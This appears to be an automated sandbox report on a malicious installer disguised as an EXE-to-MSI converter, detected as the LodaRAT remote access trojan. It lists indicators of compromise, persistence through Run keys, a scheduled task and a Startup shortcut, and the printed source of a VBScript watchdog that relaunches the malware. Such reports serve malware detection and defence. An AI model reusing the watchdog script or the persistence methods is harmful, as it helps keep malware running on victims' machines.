              Source: MSI4976.tmp, 00000003.00000002.2616628819.0000000004A1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.9|ddd|Pr1024X21280X3|Desktop|0|beta
              Source: MSI4976.tmp, 00000003.00000002.2616628819.0000000004A1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.9|ddd|Pr1024X21280X3|Desktop|0|beta6
              Source: SRACMB.exe, 0000000E.00000002.1660699190.00000000044D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81(
              Source: SRACMB.exeBinary or memory string: WIN_XPe
              Source: SRACMB.exe, 0000000F.00000003.1695804980.0000000004B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
              Source: SRACMB.exeBinary or memory string: WIN_VISTA
              Source: SRACMB.exe, 00000009.00000003.1480092843.0000000004500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81O
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|mp{T
              Source: SRACMB.exeBinary or memory string: WIN_7
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|xeq
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|
              Source: SRACMB.exeBinary or memory string: WIN_8
              Source: MSI4976.tmp, 00000003.00000002.2616628819.0000000004A1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.9|ddd|Pr1024X21280X3|Desktop|0|betasG
              Source: Yara matchFile source: Process Memory Space: MSI4976.tmp PID: 7764, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LodaRAT
              Source: Yara matchFile source: Process Memory Space: MSI4976.tmp PID: 7764, type: MEMORYSTR
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003791DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,3_2_003791DC
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003796E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_003796E2
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_001091DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,8_2_001091DC
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_001096E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,8_2_001096E2

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		2
              Valid Accounts              		11
              Windows Management Instrumentation              		11
              Scripting              		1
              Exploitation for Privilege Escalation              		1
              Disable or Modify Tools              		21
              Input Capture              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomains1
              Replication Through Removable Media              		2
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory11
              Peripheral Device Discovery              		Remote Desktop Protocol21
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job              		2
              Valid Accounts              		2
              Valid Accounts              		21
              Obfuscated Files or Information              		Security Account Manager1
              Account Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		SteganographyAutomated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Scheduled Task/Job              		21
              Access Token Manipulation              		1
              Software Packing              		NTDS2
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd11
              Registry Run Keys / Startup Folder              		12
              Process Injection              		1
              DLL Side-Loading              		LSA Secrets28
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Scheduled Task/Job              		121
              Masquerading              		Cached Domain Credentials261
              Security Software Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
              Registry Run Keys / Startup Folder              		2
              Valid Accounts              		DCSync12
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
              Virtualization/Sandbox Evasion              		Proc Filesystem3
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Access Token Manipulation              		/etc/passwd and /etc/shadow11
              Application Window Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
              Process Injection              		Network Sniffing1
              System Owner/User Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582342 Sample: sdlvrr.msi Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 40 Suricata IDS alerts for network traffic 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected LodaRAT 2->44 46 4 other signatures 2->46 8 msiexec.exe 8 24 2->8         started        12 SRACMB.exe 1 2->12         started        14 SRACMB.exe 1 2->14         started        16 5 other processes 2->16 process3 file4 36 C:\Windows\Installer\MSI4976.tmp, PE32 8->36 dropped 56 Drops executables to the windows directory (C:\Windows) and starts them 8->56 18 MSI4976.tmp 2 5 8->18         started        58 Multi AV Scanner detection for dropped file 12->58 60 Machine Learning detection for dropped file 12->60 62 Found API chain indicative of sandbox detection 12->62 signatures5 process6 dnsIp7 38 172.111.138.100, 49817, 49869, 49929 VOXILITYGB United States 18->38 32 C:\Users\user\AppData\Roaming\...\SRACMB.exe, PE32 18->32 dropped 34 C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, ASCII 18->34 dropped 48 Multi AV Scanner detection for dropped file 18->48 50 Machine Learning detection for dropped file 18->50 23 cmd.exe 1 18->23         started        26 wscript.exe 18->26         started        file8 signatures9 process10 signatures11 52 Uses schtasks.exe or at.exe to add and modify task schedules 23->52 28 conhost.exe 23->28         started        30 schtasks.exe 1 23->30         started        54 Windows Scripting host queries suspicious COM object (likely to drop second stage) 26->54 process12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              sdlvrr.msi50%VirustotalBrowse
              sdlvrr.msi42%ReversingLabsScript-AutoIt.Trojan.Lisk

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Windata\SRACMB.exe100%Joe Sandbox ML
              C:\Windows\Installer\MSI4976.tmp100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Windata\SRACMB.exe53%ReversingLabsWin32.Trojan.Lisk
              C:\Windows\Installer\MSI4976.tmp53%ReversingLabsWin32.Trojan.Lisk

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0017.t-0009.t-msedge.net
              		13.107.246.45
              		truefalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://ip-score.com/checkip/MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  172.111.138.100
                  		unknownUnited States
                  		3223VOXILITYGBtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1582342
                  Start date and time:2024-12-30 11:34:36 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 28s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:20
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:sdlvrr.msi
                  Detection:MAL
                  Classification:mal100.troj.evad.winMSI@17/14@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 90
                  • Number of non-executed functions: 295
                  Cookbook Comments:
                  • Found application associated with file extension: .msi
                  • Close Viewer

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 20.12.23.50
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  10:35:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VYZSPQ "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
                  10:35:33Task SchedulerRun new task: VYZSPQ.exe path: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                  10:35:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VYZSPQ "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
                  10:35:48AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VYZSPQ.lnk

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  172.111.138.100LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                    JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                      KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                        Machine-PO.exeGet hashmaliciousXRedBrowse
                          AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                            222.exeGet hashmaliciousLodaRAT, XRedBrowse
                              mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                  Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                    New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      s-part-0017.t-0009.t-msedge.netdocx.msiGet hashmaliciousXRedBrowse
                                      • 13.107.246.45
                                      hoaiuy.msiGet hashmaliciousXRedBrowse
                                      • 13.107.246.45
                                      222.msiGet hashmaliciousXRedBrowse
                                      • 13.107.246.45
                                      KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 13.107.246.45
                                      Machine-PO.exeGet hashmaliciousXRedBrowse
                                      • 13.107.246.45
                                      universityform.xlsmGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      universityform.xlsmGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      installer64v9.5.7.msiGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      VOXILITYGBLWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100
                                      JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100
                                      KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100
                                      Machine-PO.exeGet hashmaliciousXRedBrowse
                                      • 172.111.138.100
                                      AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100
                                      222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100
                                      mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                      • 172.111.138.100
                                      Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100
                                      loligang.mips.elfGet hashmaliciousMiraiBrowse
                                      • 104.250.189.221
                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Config.Msi\6e4800.rbs

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):603
                                      Entropy (8bit):5.347313759584736
                                      Encrypted:false
                                      SSDEEP:12:EgKQg8mmIdFyS/cqj//pFvfN2zWotHMphe2WmmY3HDyzgj82:PgT+SkqjM65ptyzAh
                                      MD5:4C834F134CA98C7F93BAA9F691F703DD
                                      SHA1:A3312F95A6E38ABAD9E02179EC6167362A0CEC8B
                                      SHA-256:C9B4DE68EEE4D7C73EA33A7261D63642A4B0F2EF60140ABE548EB0CEF2EC4719
                                      SHA-512:2FF9660A95A5C330CC1F6193E8CA88763DBFF4DDEE88E0A2668DDBE6630BEA760FDCC3D579B4B53B955A24AD0A674C44C196CE3FF5895AEBF95F80842B53245C
                                      Malicious:false
                                      Reputation:low
                                      Preview:...@IXOS.@.....@o,.Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..sdlvrr.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}.@........RemoveODBC..Removing ODBC components..%._B3D13F97_1369_417D_A477_B4C42B829328

                                      C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs

                                      Download File
                                      Process:C:\Windows\Installer\MSI4976.tmp
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):821
                                      Entropy (8bit):5.373099872154506
                                      Encrypted:false
                                      SSDEEP:24:dF/UJ8e/U/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UJ8est+G+7xLxe0WABNVIqZaVzgA
                                      MD5:A78E4933B99F0162AECEDD700409FBF7
                                      SHA1:F8897DB5F7DFF8B9E6FDA2B167BECDA1FCD487EC
                                      SHA-256:BC0D674A900BB8FF11781BF25D1621FD01C3A88F05F10AB8160EBAED7BEF218B
                                      SHA-512:743FD4D3B7B5D4C6DA21A66E0058B1E7EAE7AC2BE33FB0D9DCE1442EB34C1C48CE44C241D77E49F7E64F7C0BCE82D62BF8B320553FF167755DA2A0227A07B500
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, Author: Joe Security
                                      Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "MSI4976.tmp"..fileset = """C:\Windows\Installer\MSI4976.tmp"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VYZSPQ.lnk

                                      Download File
                                      Process:C:\Windows\Installer\MSI4976.tmp
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:35:30 2024, mtime=Mon Dec 30 09:35:30 2024, atime=Mon Dec 30 09:35:30 2024, length=949248, window=hide
                                      Category:dropped
                                      Size (bytes):1802
                                      Entropy (8bit):3.4080805112829275
                                      Encrypted:false
                                      SSDEEP:24:8hql0ZVeMKir4/PGAkw0ksFeXSUE2+s9T4IllBm:8hq4/Kir6P9kw0NsXSGr9MIlL
                                      MD5:C280AFD298C71B38156298E01AA27807
                                      SHA1:85A92C570BF84FCCC32B830222626E50EC2DC163
                                      SHA-256:288B93118FFD058AC8B00B0DA51DE1178C53FC63F1972B28ED92A74B775C3908
                                      SHA-512:0603EEB189B59A622E8FFFB9563A539890C879AB4B24500031E4AA474C2CD5D11890C39A0255CDE65A8AB71A5805556F4B855AB3220D9D4D265B5016FA88B3AA
                                      Malicious:false
                                      Preview:L..................F.@.. ....u...Z.......Z.......Z...|........................:..DG..Yr?.D..U..k0.&...&.......bBDj........Z..{....Z......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.YmT..........................=...A.p.p.D.a.t.a...B.V.1......YkT..Roaming.@......EWsG.YkT.............................R.o.a.m.i.n.g.....V.1......YpT..Windata.@......YpT.YpT..........................>...W.i.n.d.a.t.a.....`.2..|...YpT .SRACMB.exe..F......YpT.YpT....r.....................W...S.R.A.C.M.B...e.x.e......._...............-.......^..............[.....C:\Users\user\AppData\Roaming\Windata\SRACMB.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.S.R.A.C.M.B...e.x.e.(.".C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll..................................................................................................................

                                      C:\Users\user\AppData\Roaming\Windata\SRACMB.exe

                                      Download File
                                      Process:C:\Windows\Installer\MSI4976.tmp
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):949248
                                      Entropy (8bit):7.852650435892493
                                      Encrypted:false
                                      SSDEEP:24576:chloDX0XOf4Lv6ArAnQ4nCMBBG6e2q7dQGnm2J+SK:chloJf3Ar0pBre25G
                                      MD5:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      SHA1:EB9D46A7390EC9EF0C6FD179EFF8AC7907CCC775
                                      SHA-256:9F4D59259EE6D8A6278DFBDD9603151BC589D59630E667968B75BE1B881EAB54
                                      SHA-512:69CAD723AE1C9693FDA0CD6B742014F53F3153DE32B6A063C4D869B863E0ABC13DA0F9647422A4FF1B85FDEE86DDF1943A8A55CAC27DF3B989658EA71954713C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 53%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....>g.........."......P...@...`.......p........@........................... ...........@...@.......@.........................$......../..................(...........................................H...........................................UPX0.....`..............................UPX1.....P...p...D..................@....rsrc....@.......4...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                      C:\Windows\Installer\6e47fe.msi

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
                                      Category:dropped
                                      Size (bytes):974848
                                      Entropy (8bit):7.7836156225290445
                                      Encrypted:false
                                      SSDEEP:24576:uErhloDX0XOf4Lv6ArAnQ4nCMBBG6e2q7dQGnm2J+SK:uErhloJf3Ar0pBre25G
                                      MD5:3E83644E86D6165D35A80650D01DF249
                                      SHA1:F3F82555822EDC27B3EC559686E7D7B23153761B
                                      SHA-256:5CBAE41670F29829CBBEB50560A2184385E25C109DCBF3BFCFF6656BFC09AE32
                                      SHA-512:02051E5A017AF65CDF1ADC3680E93362440E60FA85BDAD6C49592ED20B7A26B9A9B9AC5B71CC8CD25B5441EA69D60A90E8879674B0546DCE00B4A6B8DDB812C3
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Installer\MSI4908.tmp

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):949970
                                      Entropy (8bit):7.852135862047015
                                      Encrypted:false
                                      SSDEEP:24576:HhloDX0XOf4Lv6ArAnQ4nCMBBG6e2q7dQGnm2J+SKL:HhloJf3Ar0pBre25GW
                                      MD5:1D8F64ED80F3B30154CC868B8B95359C
                                      SHA1:FDE2F7D45E45E618A2D818948F4E84556B9F5376
                                      SHA-256:92F94F8FF45D382503DD987CA0A4A35CB33833A6BB869F619EB04C9031DA968E
                                      SHA-512:AEF891E17B70D09BF8247E3D928360B38136FD289CC9CBEA344D3ADB93256CCF1EA1B3C505A3D0E561CEA30CDDFE42ACBCA5455E35CBDED106197BDD3A0C756A
                                      Malicious:false
                                      Preview:...@IXOS.@.....@o,.Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..sdlvrr.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}...@.......@.....@.....@........RemoveODBC..Removing ODBC components..T....@....T....@......%._B3D13F97_1369_417D_A477_B4C42B829328....J.%._B3D13F97_1369_417D_A477_B4C42B829328.@.......|..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....>g.........."...

                                      C:\Windows\Installer\MSI4976.tmp

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:modified
                                      Size (bytes):949248
                                      Entropy (8bit):7.852650435892493
                                      Encrypted:false
                                      SSDEEP:24576:chloDX0XOf4Lv6ArAnQ4nCMBBG6e2q7dQGnm2J+SK:chloJf3Ar0pBre25G
                                      MD5:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      SHA1:EB9D46A7390EC9EF0C6FD179EFF8AC7907CCC775
                                      SHA-256:9F4D59259EE6D8A6278DFBDD9603151BC589D59630E667968B75BE1B881EAB54
                                      SHA-512:69CAD723AE1C9693FDA0CD6B742014F53F3153DE32B6A063C4D869B863E0ABC13DA0F9647422A4FF1B85FDEE86DDF1943A8A55CAC27DF3B989658EA71954713C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 53%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....>g.........."......P...@...`.......p........@........................... ...........@...@.......@.........................$......../..................(...........................................H...........................................UPX0.....`..............................UPX1.....P...p...D..................@....rsrc....@.......4...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                      C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):49152
                                      Entropy (8bit):0.7683101341214462
                                      Encrypted:false
                                      SSDEEP:12:JSbX72FjjbJAGiLIlHVRpth/7777777777777777777777777vDHFU6eK8pSl0i5:JtJQI5p2hF
                                      MD5:FEDC8BEA658CC75FDEB12389EDC0F1F2
                                      SHA1:398F22FAEDEE9958F284414ABB2D2E1FDE0F3143
                                      SHA-256:0393B43B6FB38353B400348F7BB812B2E079C1B08525991152F3E01B854879FA
                                      SHA-512:2EFFFCAA5262043441A177D9384B62DC3690A955451BAB34746E0E715434FA92F61805610145F02D40F8E70AC1B14224970951725A6B7CD46E7ABA16899BEFEF
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Installer\inprogressinstallinfo.ipi

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):1.1458944438109988
                                      Encrypted:false
                                      SSDEEP:48:L6DuQZsrMLFXOxT59e3lhlSzUgYsSzfTl:+DrsTTeVhlYRTY
                                      MD5:DA3A1FF557C48ED3EB70F408DE86B3D8
                                      SHA1:D63584EBDD40C7DBB9111A590B8B41A55E05E66F
                                      SHA-256:29AB99E4DA063BF3D71774C81D761ADC1B44150B25B051F2305645B7B278D1C7
                                      SHA-512:F8F0CA894F0E72FF087B60BED648F161D607C400EE3C301F96518171A7A661FA70AB8111B032F9C29AB057B41820529C04EBDFD319EDBFE35D398A8E0113539B
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):360001
                                      Entropy (8bit):5.362968934206052
                                      Encrypted:false
                                      SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauV:zTtbmkExhMJCIpEY
                                      MD5:93FCA1C757D924C9A469C9A94138CA04
                                      SHA1:D7FDB05DA10BF8C7E84D9F2EBC2680A6AE81572C
                                      SHA-256:215BC370599F4FFB6E5C1424DB66481F7FBAD40815C3040E43B238FA017E7CB1
                                      SHA-512:DC7D364FC2ED69D77925EB31875F9D57BE1A52A09887922722D19C6D615D4041C8038CB90578109F7C268C34EC8E210ABFDA0D72580C12A0F6774C388FE498F8
                                      Malicious:false
